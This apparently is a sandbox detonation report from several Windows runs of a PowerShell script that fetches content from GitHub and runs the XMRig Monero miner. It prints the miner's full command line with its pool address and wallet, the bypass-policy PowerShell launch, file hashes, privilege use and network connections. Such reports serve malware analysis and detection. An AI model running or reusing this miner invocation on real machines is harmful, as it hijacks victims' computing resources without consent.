memory/3812-131-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-132-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-133-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-134-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-135-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-136-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-137-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-138-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-139-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-140-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-141-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-142-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-143-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-144-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-145-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-146-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-147-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-148-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-149-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-150-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-151-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-152-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-153-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-154-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-155-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-156-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3356-0-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhfwymfu.rmz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3356-9-0x00000273DCB90000-0x00000273DCBB2000-memory.dmp

memory/3356-10-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/3356-11-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/3356-12-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/3356-14-0x00000273DD120000-0x00000273DD132000-memory.dmp

memory/3356-15-0x00000273DD100000-0x00000273DD10A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1736-46-0x000001776F3E0000-0x000001776F400000-memory.dmp

memory/1736-47-0x000001776F430000-0x000001776F450000-memory.dmp

memory/1736-48-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-50-0x000001776F470000-0x000001776F490000-memory.dmp

memory/1736-49-0x000001776F450000-0x000001776F470000-memory.dmp

memory/1736-51-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/3356-52-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/3356-53-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

memory/1736-54-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-57-0x000001776F470000-0x000001776F490000-memory.dmp

memory/1736-56-0x000001776F450000-0x000001776F470000-memory.dmp

memory/1736-55-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-58-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-59-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-60-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-61-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-62-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-63-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-64-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-65-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-66-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-67-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-68-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-69-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-70-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-71-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-72-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-73-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-74-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-75-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-76-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-77-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-78-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-79-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-80-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-81-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-82-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-83-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-84-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-85-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-86-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-87-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-88-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-89-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-90-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-91-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-92-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-93-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-94-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-95-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-96-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-97-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-98-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-99-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-100-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-101-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-102-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-103-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-104-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-105-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-106-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-107-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-108-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-109-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-110-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-111-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-112-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-113-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-114-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-115-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

memory/1736-116-0x00007FF70B3A0000-0x00007FF70BFD3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2360-2-0x00007FFAD8ED3000-0x00007FFAD8ED4000-memory.dmp

memory/2360-5-0x0000021733620000-0x0000021733642000-memory.dmp

memory/2360-8-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-10-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-9-0x000002174BDD0000-0x000002174BE46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fqny3km0.xe3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2360-25-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-48-0x000002174BD90000-0x000002174BDA2000-memory.dmp

memory/2360-61-0x0000021733660000-0x000002173366A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4448-90-0x000001C68A810000-0x000001C68A830000-memory.dmp

memory/4448-91-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-92-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/2360-93-0x00007FFAD8ED3000-0x00007FFAD8ED4000-memory.dmp

memory/2360-94-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-95-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/4448-96-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-97-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-98-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-99-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-100-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-101-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-102-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-103-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-104-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-105-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-106-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-107-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-108-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-109-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-110-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-111-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-112-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-113-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-114-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-115-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-116-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-117-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-118-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-119-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-120-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-121-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-122-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-123-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-124-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-125-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-126-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-127-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-128-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-129-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-130-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-131-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-132-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-133-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-134-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-135-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-136-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-137-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-138-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-139-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-140-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-141-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-142-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-143-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-144-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-145-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-146-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-147-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-148-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-149-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-150-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-151-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-152-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-153-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-154-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-155-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/4448-156-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:43

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
